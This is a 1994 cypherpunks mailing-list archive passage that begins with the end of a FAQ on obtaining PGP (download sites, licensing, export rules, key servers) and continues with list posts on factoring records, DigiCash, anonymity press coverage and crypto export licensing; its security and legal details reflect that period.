Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc.
v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps
8 data bits, 1 stop, no parity, as fast as your modem will go.
Use ANSI terminal emulation, or if you can't, try VT-100.
Free access to PGP. If busy or no answer, try again later.
For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu.
(303) 772-1062 Longmont, Colorado number - 2 lines.
(303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area.
The Freedom Files BBS, DeLand Florida, USA 904-738-2691

Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567

The Ferret BBS (North Little Rock, Arkansas)
(501) 791-0124 also (501) 791-0125
Special PGP users account:
login name: PGP USER
password: PGP
This information from: Jim Wenzel

CVRC BBS 317-791-9617

CyberGold BBS 601-582-5748

Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA

In the UK, try 01273-688888

Other BBS -- check your local BBS. Chances are good that it has any release that is at least a month old if it has much of a file area at all.

OTHER FTP SITES

ftp.informatik.uni-hamburg.de
    /pub/virus/crypt/pgp
    This site has most, if not all, of the current PGP files.

ftp.ox.ac.uk (163.1.2.4)
    /pub/crypto/pgp
    This is a well organized site with most of the current PGP files as well as shells and mailer scripts.

ftp.netcom.com
    /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP.

ftp.ee.und.ac.za
    /pub/crypto/pgp

ftp.csua.berkeley.edu
    /pub/cypherpunks/pgp (DOS, MAC)

ftp.demon.co.uk
    /pub/amiga/pgp
    /pub/archimedes
    /pub/pgp
    /pub/mac/MacPGP

ftp.informatik.tu-muenchen.de

ftp.funet.fi

ftp.dsi.unimi.it
    /pub/security/crypt/PGP

ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon)
    /pub/atari/misc/pgp/pgp26uib.lzh (2.6ui ttp, 2.3a docs)
    /pub/atari/misc/pgp/pgp26uis.lzh (2.6ui sources)
    /pub/atari/misc/pgp/pgp26ui.diffs (Atari diffs for 2.6 sources)

wuarchive.wustl.edu
    /pub/aminet/util/crypt

src.doc.ic.ac.uk (Amiga)
    /aminet
    /amiga-boing

ftp.informatik.tu-muenchen.de
    /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2)

iswuarchive.wustl.edu
    pub/aminet/util/crypt (Amiga)

nic.funet.fi (128.214.6.100)
    /pub/crypt

ftp.uni-kl.de (131.246.9.95)
    /pub/aminet/util/crypt

qiclab.scn.rain.com (147.28.0.97)
pc.usl.edu (130.70.40.3)
leif.thep.lu.se (130.235.92.55)
goya.dit.upm.es (138.4.2.2)
tupac-amaru.informatik.rwth-aachen.de (137.226.112.31)
ftp.etsu.edu (192.43.199.20)
princeton.edu (128.112.228.1)
pencil.cs.missouri.edu (128.206.100.207)
ftp.csua.berkeley.edu
kauri.vuw.ac.nz
nctuccca.edu.tw
    /PC/wuarchive/pgp/
ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz

Also, try an archie search for PGP.

FTPMAIL

For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "Help" to ftpmail at decwrl.dec.com. You will be sent an instruction sheet on how to use the ftpmail service. It works with messages something like this:

> To: ftpmail at decwrl.dec.com
> Subject: Ftpmail request
> Connect ftp.csua.berkeley.edu
> chdir pub/cypherpunks/pgp/pgp262
> uuencode
> get pgp262.zip
> quit

Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP.

For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message.

To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field.

Subject               What you will get
GET pgp26i.zip        MS-DOS executable (uuencoded)
GET pgp26is.zip       MS-DOS source code (uuencoded)
GET pgp26is.tar.gz    UNIX source code (uuencoded)

For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message.

MACPGP OPTIONS

There are multiple parallel efforts to write an up-to-date MacPGP. See the following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz has updated his MacPGP to support Apple events, and his distribution comes with complete source code. Grady's netcom directory contains a different version, about which he says "This latest bug release beta 1.23 fixes several relatively minor bugs. Source to this version is NOT available, so its use should be restricted to experimentation only."
ftp://ftp.csn.net/mpj/README.MPJ
ftp://ataxia.res.wpi.edu/pub/mac-pgp/README
ftp://highway.alinc.com/pub/jordyn/mac-pgp/README
ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc

PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95

There isn't one, yet, that I know of (at least not a true native Windows application). There are several good shells that call the DOS PGP for the actual work, though. I use Viacrypt's, but there are others available as shareware or freeware at most of the sites listed above for PGP itself.

IS MY COPY OF PGP GOOD?

If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.). If it isn't, the package is suspect and should not be used or distributed. The site you found it on should remove it so that it does no further harm to others.

To be really sure, you should get PGP directly from MIT or check the signatures with a version of PGP that you trust. The copies of PGP on ftp.csn.net/mpj, ftp.netcom.com/pub/mp/mpj, and the Colorado Catacombs BBS are direct copies of the ones on MIT, except that the ones on the BBS include a BBS advertisement (automatically added by the system when it virus scans new files) in the outer .zip files.

OTHER PGP DOCUMENTATION

For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc

More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html

Windows shells documentation http://www.LCS.com/winpgp.html

LANGUAGE MODULES

These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files.
German
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha

Italian
* _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
* _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Russian
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
* _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip (MIT version)
* _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26uir.zip (ui version)
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish
* _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
* _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

Swedish
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt

MAILING LIST FOR PGP AND RELATED TOPICS (PGP MAILING LIST IN GERMAN)

The list address: pgp-friends at fiction.pb.owl.de

The *request* address (for subscribe/unsubscribe and other administrative matters): pgp-friends-request at fiction.pb.owl.de

WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS?

For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip

The practical meaning, until the law is corrected to make sense, is that you are requested to get PGP from sites outside of the USA and Canada if you are outside of the USA and Canada. If you are in France, I understand that you aren't even supposed to import it. Other countries may be worse.
Make sure you follow the laws of your own country. If you want to officially export PGP, you may be able to get permission in limited cases and for a fee. Contact the U. S. Department of State for information.

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA?

MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them.

For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course).

Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercially in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware.

"PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name.

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA?

MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm.
Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada.

For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments.

The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details.

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA?

MIT PGP is only for noncommercial use in areas where there is a patent on software implementations of the IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds outside of the USA, even though the RSA patent does not.

The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, Ascom Tech Ltd., IDEA Lizenz, Postfach 151, CH-4502 Solothurn, Switzerland, Tel ++41 65 242828, Fax ++41 65 242847.

WHAT IS COMMERCIAL USE?

Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use.
Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advice. Use it at your own risk.

WHAT IS THE "TIME BOMB" IN MIT PGP 2.6?

There was a version byte change in MIT PGP 2.6 as of 1 September 1994. See ftp://ftp.csn.net/mpj/pgpbomb.asc for details.

ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS?

If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies.

MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys is supposed to automatically be enabled in PGP 2.6.2 in December, 1994. By then, hopefully, most people will have had a chance to upgrade to a version of PGP that can use them, so longer keys won't be a big problem. On the other hand, 1024 bit keys are probably beyond the reach of most criminals and spies to break, anyway.
MORE WORLD WIDE WEB URLs

http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html
http://draco.centerline.com:8080/~franl/pgp/pgp.html
http://draco.centerline.com:8080/~franl/crypto/cryptography.html
http://www.pegasus.esprit.ec.org/people/arne/pgp.html
http://rschp2.anu.edu.au:8080/crypt.html
http://ibd.ar.com/PublicKeys.html
http://www.ifi.uio.no/~staalesc/PGPversions.html

WINDOWS SHELLS

Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found.

MACPGP KIT

The MacPGP kit is a user interface for the Mac version of PGP. See

ftp://ftp.netcom.com/pub/qw/qwerty
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx

BUGS

See the documentation that comes with PGP in the latest versions for bugs in the older versions. The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html

BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM

For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html

INTEGRATING PGP AND PINE

Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically.

HOW DO I PUBLISH MY PGP PUBLIC KEY?

There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server.
pgp-public-keys at pgp.iastate.edu
pgp-public-keys at pgp.mit.edu
pgp-public-keys at pgp.ai.mit.edu
public-key-server at pgp.ai.mit.edu
pgp-public-keys at cs.tamu.edu
pgp-public-keys at chao.sw.oz.au
pgp-public-keys at jpunix.com
pgp-public-keys at dsi.unimi.it
pgp-public-keys at kiae.su
pgp-public-keys at fbihh.informatik.uni-hamburg.de

There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html

There is a commercial key certification and publication service, too. Send mail to info at Four11.com for information.

You can also mail your key to pgp-public-keys at c2.org, and it will be posted to the subscribers of that mailing list, sent to the keyservers, and posted to alt.security.keydist. To subscribe to the mailing list, send a message to majordomo at c2.org with "subscribe pgp-public-keys" in the body of the message.

Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062).

Another way is to just send it to your correspondents.

You could add it to your .plan file so that finger returns your key.

You could add it to some of your postings.

No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours.
Here is my public key:

Permission is granted to distribute unmodified copies of this FAQ.

To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu.

There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP or in one of the books about PGP.

Send corrections to mpj at netcom.com. I regret that I lost some of the corrections people sent me on the last round of this FAQ, so if I missed yours, please send it again. Thanks.
Michael Paul Johnson    Colorado Catacombs BBS 303-772-1062
mpj at csn.org aka mpj at netcom.com    m.p.johnson at ieee.org
ftp://ftp.csn.net/mpj/README.MPJ    CIS: 71331,2332
ftp://ftp.netcom.com/pub/mp/mpj/README    -. --- ----- ....

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAgUBLwRpyvX0zg8FAL9FAQF57gQAoUHu3+YN+K4KsaJU3bOUgLAPhCzTAQId
PRyhY96OjzTRVPmR0bLeZjBCnj4Z2VPirsURA2dIKiQwvCSO9/ODD/HBwty683AD
sGWNPhPJ5i7Ik51EGC9xRn2aCbom9KhwXHQNpsB85hI+JRKaorNHlDO7H52FBGA+
Cvb1tro1Zpg=
=aM1F
-----END PGP SIGNATURE-----

From lce at wwa.com Fri Dec 30 12:51:02 1994
From: lce at wwa.com (Larry E)
Date: Fri, 30 Dec 94 12:51:02 PST
Subject: January meeting with Zimmermann's prosecutor
In-Reply-To:
Message-ID:

In article , Philip Zimmermann wrote:

> The following is a message from my lawyer, Phil Dubois. He posted it
> to alt.security.pgp, and I thought I should post it here as well. The
> message is signed with his key.
>
> --Philip Zimmermann
>

The aforementioned signed message from PKZ's lawyer message failed signature check on my system, apparently because it contained a very long text line which, somewhere along the way, was chopped into two lines before it arrived in my mailbox. The two lines as they appeared in my message (which failed signature test) are:

From kafka at desert.xs4all.nl Fri Dec 30 13:45:09 1994
From: kafka at desert.xs4all.nl (Patrick '3l33t' Oonk)
Date: Fri, 30 Dec 94 13:45:09 PST
Subject: No privacy with DigiCash
In-Reply-To:
Message-ID: <199412302145.AA09925@xs1.xs4all.nl>

-----BEGIN PGP SIGNED MESSAGE-----

ddt at lsd.com (Dave Del Torto) once said:

DD> At 6:39 am 12/24/94, Jonathan Cooper wrote:
DD> >> one of the big selling points of DigiCash. Is there something I am
DD> >> overlooking, some way to buy things privately with DigiCash?
DD> >
DD> > I don't think so. It appears that the initial implementation of
DD> >DigiCash works exactly that way [based on what I've read on their W3
DD> >server]. Of course, I could tell you more exactly had they replied to
DD> >any of my four separate attempts to try it out ..
DD>
DD> Interesting. I too have made four requests and still not received any
DD> software. Can you say "vapor?"

I have received it and I've seen the future. It's cool.

Patrick

!*$||#%&@#|!*&*&|$!#!@# NO CARRIER
_______________________________________________________________________________
kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkkno, SL-1200
Kafka's home page
_______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLv1sj5RymF15lPcFAQH4QgH8CUpPRJb8TbobmYC4hOng+NExoyW1fPDL
Ax6BqJeO2tX9QAbKkXPPLgLE9kL8Y1AZLaFPa0KKQVp3S7EAVfEwfg==
=shGQ
-----END PGP SIGNATURE-----

From witter at utdallas.edu Fri Dec 30 18:10:17 1994
From: witter at utdallas.edu (witter at utdallas.edu)
Date: Fri, 30 Dec 94 18:10:17 PST
Subject: My "netcard"
In-Reply-To:
Message-ID:

On Fri, 30 Dec 1994 witter at utdallas.edu spilled:

>
>
>
>
> On Fri, 30 Dec 1994, Anonymous User wrote:
>
> > Michael D. Crawford wrote:
> >
> > > One might ask, "if they can finger, why give the key?" The recipient
> > > might not be on the Internet. I don't think you can finger from AOL,
> > > and I'm sure you can't from UUCP, AppleLink or CompuServe.
> >
> > Yes you can! You just have to know how to use finger-by-email. :)
> >
>
> Just in case you were wondering...
>
> TO:infobot at infomania.com
> Sub: FINGER name at internic.net
^^^^^^^^^^^^^^^^^ should be name at site

From mpd at netcom.com Fri Dec 30 18:34:10 1994
From: mpd at netcom.com (Mike Duvos)
Date: Fri, 30 Dec 94 18:34:10 PST
Subject: New GNFS Factoring Record
Message-ID: <199412310234.SAA21711@netcom10.netcom.com>

Arjen Lenstra posted an article in sci.crypt earlier today reporting on the factorization of a 119 digit number using the General Number Field Sieve. This is a new record factorization for the algorithm, surpassing the 116 digit number factored in July of this year.

I would encourage anyone interested in factoring to read the article, which I will not waste bandwidth by quoting here. A few of the more interesting points follow.

Lenstra estimates that GNFS would have factored RSA-129 in approximately one-quarter of the time employed by the QS algorithm used for that task a while back.

100,001 primes were used for the rational factor base. 360,001 were used for the algebraic factor base.

Sieving took approximately 250 MIPS years.

Selection of the polynomial took three days on a DEC 3000.

The factorization was found on the third dependency.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From camp at industrial.com Fri Dec 30 21:26:49 1994
From: camp at industrial.com (camp at industrial.com)
Date: Fri, 30 Dec 94 21:26:49 PST
Subject: another factoring thing. . . .
Message-ID:

Hey did anyone see the article, some time ago in Science News (May 14, 1994) there was this article on using a 'quantum computer'. Through the marvels of quantum mechanics it is theoretically possible to build a computer that would be really good at factoring large numbers such as the ones used in RSA. This combined with team sieving could possibly be used to significantly reduce the time required to factor a key. Any thoughts, did anyone else see the article, has there already been a really stimulating discussion that I missed? Well let me know.
gemnis

From nelson at crynwr.com Fri Dec 30 22:50:33 1994
From: nelson at crynwr.com (Russell Nelson)
Date: Fri, 30 Dec 94 22:50:33 PST
Subject: Cyphernomicon via the WWW
Message-ID:

Tim May's Cyphernomicon is available (on an experimental basis) from . This is based on an old version of his document. I'll update it within a day or so (ftp.netcom.com is too busy). The document is used unchanged -- a gateway program converts it on the fly. His outline form is preserved. I think you'll like the way it's presented.

I know it still has problems. I just got this working. It's nearly 2 AM. If I'm to have any hope of making it to midnight tomorrow, I'd better get some sleep tonight!

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From nelson at crynwr.com Fri Dec 30 22:54:11 1994
From: nelson at crynwr.com (Russell Nelson)
Date: Fri, 30 Dec 94 22:54:11 PST
Subject: Cyphernomicon via the WWW
Message-ID:

Whoops! Silly me, I should know better than to announce things at 2AM. I forgot the www in apocalypse (bet you didn't know there *was* a www in apocalypse -- it's silent like the pee in swimming). Anyway, the correct URL is:

http://www.apocalypse.org/pub/u/nelson/bin.cgi/cyphernomicon

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From blancw at pylon.com Sat Dec 31 01:21:07 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Sat, 31 Dec 94 01:21:07 PST
Subject: Technical Knowledge Reflecting Moral Ignorance
Message-ID: <199412310922.BAA18704@deepthought.pylon.com>

Responding to msg by James A.
Donald:

:If we fail to point out that people have a right to
:privacy, if we fail to point out the moral and
:constitutional implications of coercive inspection,
:then our enemies win, by citing tax evaders child
:pornographers terrorists and pedophiles.

Well, sure, you can always expect that government employees should have to know about morality, since they've made themselves responsible for things like social welfare and the advancement of Great Societies. But no one else is required to 'behave' that way - they only need to know that they will suffer the consequences of trespassing the lines which divide us.

:If all morality is relative, then the only possible way
:for people to live together peaceably is for a single
:arbitrary will and to impose that morality by as much
:violence as necessary -- this is the classic argument
:(Hobbes, Nazis) for absolutist government.

No one said that morality is or should be relative, nor either that they want to live together peaceably. They did express their displeasure at having to read anyone's disapproval on particular applications of crypto knowledge.

I myself don't think that being able to evaluate human actions in terms of their propriety is outside the capacities of technogeeks to ponder (don't jump if you don't identify with one). I agree it is important, especially for those who do expect to live in formal societies, to develop a *conscious knowledge* of morality, of the meaning of human actions in terms of 'right' and 'wrong'. If we were all properly acquainted with the elements of morality it would be easier to identify its place in the life of real humans who have values and wish to protect them from deleterious, intrusive attacks (from any source). A conscious knowledge also makes it possible to present valid basis for objecting to the 'evil' which governments will do.
You said, in reference to ye kings of olde, that "many of the actions of the state were unlawful" and that there were those who established that the king could not "make law as he pleased". Actually, being a conquering ruler gives a king the latitude to make any 'law' that he pleases. But to free themselves from the king's grasp, the influential philosophers of the past took their mind to a consideration of what the substance of morality, or 'goodness/badness', means in the life of a human being qua the nature of being human. What else could be the basis for the desire to act in freedom & liberty from autocratic rule?

Some cpunks don't think it's necessary to indulge in these discussions, but individuals always act within the context of evaluations upon the implications of their actions. It doesn't go away; it must be dealt with, especially if what one (publicly) contemplates doing is potentially in conflict with others' high moral standards.

..
Blanc

From carolann at icicle.winternet.com Sat Dec 31 06:13:38 1994
From: carolann at icicle.winternet.com (Carol Anne Braddock)
Date: Sat, 31 Dec 94 06:13:38 PST
Subject: From Me to You for the Coming Year....*giggle*
Message-ID:

[ASCII-art banner: "HAPPY NEW YEAR!!" followed by "Love Always, Carol Anne"]

RegisteredBEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REGISTERED PGP KEY NO.0C91594D
carolann at icicle.winternet.com finger carolann at winternet.com |more
***********************************************************************
My WWW Homepage Page is at: http://www.winternet.com/~carolann

From jya at pipeline.com Sat Dec 31 07:03:08 1994
From: jya at pipeline.com (John Young)
Date: Sat, 31 Dec 94 07:03:08 PST
Subject: NYT on Anon Amok
Message-ID: <199412311503.KAA08590@pipe1.pipeline.com>

Peter Lewis writes long article today on net anonymity, good, bad and heavenly, with emphasis on remailers, and probable legislative control.

And a funny piece on Bill's buy of St. Peter's Boys Club.

For email duo-copy send blank message with subject: ANON_gee

From perry at imsi.com Sat Dec 31 09:39:19 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Sat, 31 Dec 94 09:39:19 PST
Subject: remarkably bad media
Message-ID: <9412311739.AA09311@webster.imsi.com>

A remarkably bad article by Peter H. Lewis in today's Times -- front page, actually -- on anonymity on the net.
He manages to confuse the "Microsoft acquires Church" spoof with problems from anonymity -- in fact, he opens his article by apparently chalking up the whole episode to anonymity rather than complete stupidity on the part of anyone believing an obvious spoof. (The original "AP" article was not anonymous -- someone just posted a satirical message to the net. The connection with anonymity is so tenuous as to be nonexistent.)

Things get rapidly worse. Just to list some of the problems, he calls digital cash a way for people to open Swiss bank accounts, confuses the case of that kid at MIT who was running pirate boards with a case of anonymity, spreads lots of FUD, gets lots of quotes from some alarmist professor no one has ever heard of, makes a hash of explaining why anonymous remailers are useful (and doesn't understand that forgery and anonymity are sort of inherent in the fabric of the net), makes a hash of explaining digital signatures, etc.

Truly one of the worst articles I've ever seen in the New York Times on any topic of any sort -- and given the Times, that's an amazing level to have fallen to. The man seems devoid of even a basic understanding of journalism -- as one example, journalists are supposed to interview the people they are discussing to get comment (this is nearly the first rule), but he never bothered to interview a single remailer operator, it seems, even though he mentions Julf by name. Maybe sending some email to Julf would have been too much effort, or maybe it would have made the story less sensationalistic if he'd bothered to be balanced. He didn't seem to check any of his facts, either (another rule), and the whole thing reads like an editorial instead of an objective piece of reporting.

I really wonder if Lewis actually lives and works on the internet, or if he's truly the amateur he seems to be. He comes off as not understanding the basic mechanics of how things operate day to day that even a non-technical person would understand.
I would complain somehow to the Times, but I suspect that it would be impossible to convey properly even the rules of simple journalism that he broke, even ignoring all the technological misunderstandings. Sadly, the editors would have no reason to listen to me, a random guy they'd never heard of.

Another step in the slow disintegration of a once proud "paper of record", I'm afraid.

Perry

From rishab at dxm.ernet.in Sat Dec 31 10:16:01 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 31 Dec 94 10:16:01 PST
Subject: Calling beta testers for reputation software
Message-ID:

Vladimir Z Nuri says he's having trouble posting to the list, so here's the note on phase three of the beta-test for his experimental reputation/mail filtering software. Some people believe vznuri (the visionary) is Larry Detweiler; I don't really care - he's too coherent, and his software looks interesting. Non netcom-ers will have trouble ftp'ing to netcom, though.

Rishab

===========cut here==========
To: cypherpunks at toad.com
Cc: rishab at dxm.ernet.in (Rishab Aiyer Ghosh)
Subject: Pazzap reputation software
Date: Fri, 30 Dec 94 21:38:57 -0800
From: "Vladimir Z. Nuri"

Hello. At one time I posted a message asking for volunteers to help me debug some reputation/mail filtering software. My "phase two" tests are progressing and the software is serving multiple subscribers with a degree of reliability. I would now like to open up my tests to the wider cypherpunk audience for "phase three".

I would be delighted if anyone would be interested in participating. At this point I particularly need people who want to play with the command features and are not just subscribing to what they see as a free and no-involvement-required mail filtering service. In preparation for any new users I have just html'd the complete documentation for easy reference on my web site.

The software is still in a prototype stage and the redistribution of messages is not at the utmost reliable level.
In particular at this stage I may still have to periodically put the list on "hold" periodically to debug the software. However at this point I believe the reliability is rapidly nearing a high level.

For more information use Mosaic or Lynx to the URL

ftp://ftp.netcom.com/pub/vznuri/home.html

(I have relaxed earlier more formal nondisclosure terms but I do ask that you submit to an informal "nonpublicity" agreement.)

This will serve as the master bulletin board for future developments in the software. Pay special attention to the "status" item which I will update very regularly (and in most cases use in lieu of a mailing list).

Thanks--

p.s. this was posted through a remailer due to mailing problems at my end.

Vladimir Z. Nuri
vznuri at netcom.com
`Imagination is more important than knowledge' (Einstein)
===========cut here==========

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh
rishab at dxm.ernet.in
rishab at arbornet.org
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA
"In between the breaths is the space where we live" - Lawrence Durrell

From rah at shipwright.com Sat Dec 31 11:48:42 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 31 Dec 94 11:48:42 PST
Subject: ANON_gee
Message-ID:

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation
44 Farquhar Street
Boston, MA 02331 USA
(617) 323-7923
"There is no difference between someone who eats too little and sees Heaven and someone who drinks too much and sees snakes." -- Bertrand Russell

From mab at research.att.com Sat Dec 31 13:30:14 1994
From: mab at research.att.com (Matt Blaze)
Date: Sat, 31 Dec 94 13:30:14 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID: <9412312132.AA11647@merckx.info.att.com>

DRAFT - PLEASE DO NOT QUOTE OR REDISTRIBUTE

Mostly to find out what the process was like, I recently applied for, and received, a temporary export license for a so-called ``exportable'' telephone voice encryption device to take with me on a business trip to England and Belgium. I returned from the trip last week, device in hand. Here's how it went.

